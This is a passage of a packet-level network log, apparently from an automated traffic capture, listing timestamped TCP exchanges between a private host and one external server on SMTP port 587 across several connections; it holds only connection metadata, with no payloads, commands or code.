Nov 12, 2024 15:28:48.903412104 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:48.903719902 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:48.903744936 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:48.903754950 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:48.903764963 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:48.903778076 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:48.903826952 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:48.903839111 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:48.903851986 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:48.903861046 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:49.138993979 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:28:49.191559076 CET	49783	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:21.364181995 CET	49783	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:21.369781017 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:21.604458094 CET	587	49783	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:21.605014086 CET	49783	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:23.091598034 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:23.096522093 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:23.099744081 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:24.322674036 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:24.322762012 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:24.322813034 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:24.325870991 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:24.328598976 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:24.570666075 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:24.571088076 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:24.575948954 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:24.818229914 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:24.818783045 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:24.823693037 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.072205067 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.072221994 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.072233915 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.072371960 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:25.075587988 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:25.080621958 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.322721004 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.323873997 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:25.328644991 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.734977007 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.735332012 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:25.740227938 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.982517004 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:25.982743979 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:25.987698078 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:26.241053104 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:26.241349936 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:26.246434927 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:26.488368988 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:26.488656998 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:26.493515968 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:26.741084099 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:26.741306067 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:26.746650934 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:26.988511086 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:26.996825933 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:26.996825933 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:26.996929884 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:26.997097969 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:26.999625921 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.002327919 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.002341986 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.002351999 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.002412081 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.002415895 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.004547119 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.004616022 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.004626036 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.004636049 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.004646063 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.004646063 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.004673958 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.004709959 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.004715919 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.004719973 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.004730940 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.004731894 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.004780054 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.004817009 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.004817009 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.007278919 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.007455111 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.009566069 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.009578943 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.009670019 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.009732962 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.009758949 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.009809971 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.009923935 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.010018110 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.010027885 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.010103941 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.010209084 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.011658907 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.013628960 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.013752937 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.014672041 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.014745951 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.014770031 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:27.014847040 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015038013 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015120029 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015130997 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015141010 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015157938 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015168905 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015180111 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015227079 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015239954 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015258074 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015268087 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015320063 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015331030 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.015341997 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.016514063 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.018330097 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.018341064 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.018352985 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.018528938 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.019411087 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.019422054 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.019438982 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.019503117 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.019634962 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.019720078 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.532398939 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:27.676022053 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:28.359091997 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:28.364061117 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:28.606276989 CET	587	50786	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:28.606777906 CET	50786	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:28.607851982 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:28.612704992 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:28.612869978 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:29.413234949 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:29.413419008 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:29.418312073 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:29.654483080 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:29.654666901 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:29.659534931 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:29.896200895 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:29.896644115 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:29.901443005 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.148673058 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.148704052 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.148718119 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.148766041 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:30.150959015 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:30.156821966 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.400340080 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.404463053 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:30.410536051 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.646564960 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.646882057 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:30.652826071 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.889182091 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:30.889708996 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:30.894645929 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.133562088 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.133846998 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.138745070 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.375355959 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.378815889 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.383712053 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.623688936 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.624315977 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.629234076 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.865349054 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.865745068 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.865833998 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.865884066 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.865978956 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.867899895 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.870613098 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.870671034 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.870744944 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.870759010 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.870796919 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.870840073 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.872761965 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.872773886 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.872792006 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.872806072 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.872836113 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.872843027 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.872853994 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.872870922 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.872890949 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.872900009 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.872910023 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.872919083 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.872936010 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.872939110 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.872962952 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.872978926 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.875619888 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.875674963 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.875916004 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.875960112 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.877708912 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.877763987 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.877791882 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.877803087 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.877827883 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.877863884 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.877903938 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.877912045 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.877955914 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.877971888 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.878000021 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.878000975 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.878055096 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.880630970 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.880681038 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.880808115 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.880852938 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:31.882713079 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.882849932 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.882972002 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.882981062 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883049011 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883119106 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883182049 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883191109 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883227110 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883235931 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883320093 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883330107 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883359909 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883368969 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883446932 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883455992 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883493900 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883502960 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883591890 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883600950 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.883630037 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.885766029 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.885860920 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.885893106 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.885941982 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.885951042 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.885987997 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:31.885997057 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:32.463481903 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:32.615283012 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:46.692250967 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:46.697134972 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:46.933551073 CET	587	50787	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:46.933955908 CET	50787	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:46.934746027 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:46.939596891 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:46.939685106 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:47.739839077 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:47.740137100 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:47.744932890 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:47.979327917 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:47.981784105 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:47.987101078 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.222302914 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.225997925 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:48.231009007 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.473536968 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.473560095 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.473575115 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.473587036 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.473628044 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:48.473649979 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:48.475776911 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:48.480861902 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.715435028 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.718732119 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:48.723654032 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.958275080 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:48.958549023 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:48.963830948 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:49.199013948 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:49.199239016 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:49.204124928 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:49.451762915 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:49.459744930 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:49.464975119 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:49.699919939 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:49.700118065 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:49.704998970 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:49.945936918 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:49.946230888 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:49.951433897 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.185955048 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.187973976 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.188041925 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.188041925 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.188224077 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.191658974 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.192809105 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.192878008 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.192889929 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.193077087 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.193109989 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.195735931 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.196603060 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.196655035 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.196666002 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.196688890 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.196697950 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.196708918 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.196719885 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.196738005 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.196738958 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.196738958 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.196775913 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.196784973 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.196794033 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.196861982 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.197942019 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.199696064 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.200563908 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201598883 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201639891 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201680899 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201687098 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.201709986 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201740980 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.201756001 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201787949 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.201795101 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201841116 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201874971 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201879025 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.201922894 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.201957941 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.202061892 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.204499960 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.206593990 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.206638098 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.206696033 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.206732988 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.206742048 CET	50788	587	192.168.2.5	51.195.88.199
Nov 12, 2024 15:30:50.206856012 CET	587	50788	51.195.88.199	192.168.2.5
Nov 12, 2024 15:30:50.207094908 CET	587	50788	51.195.88.199	192.168.2.5
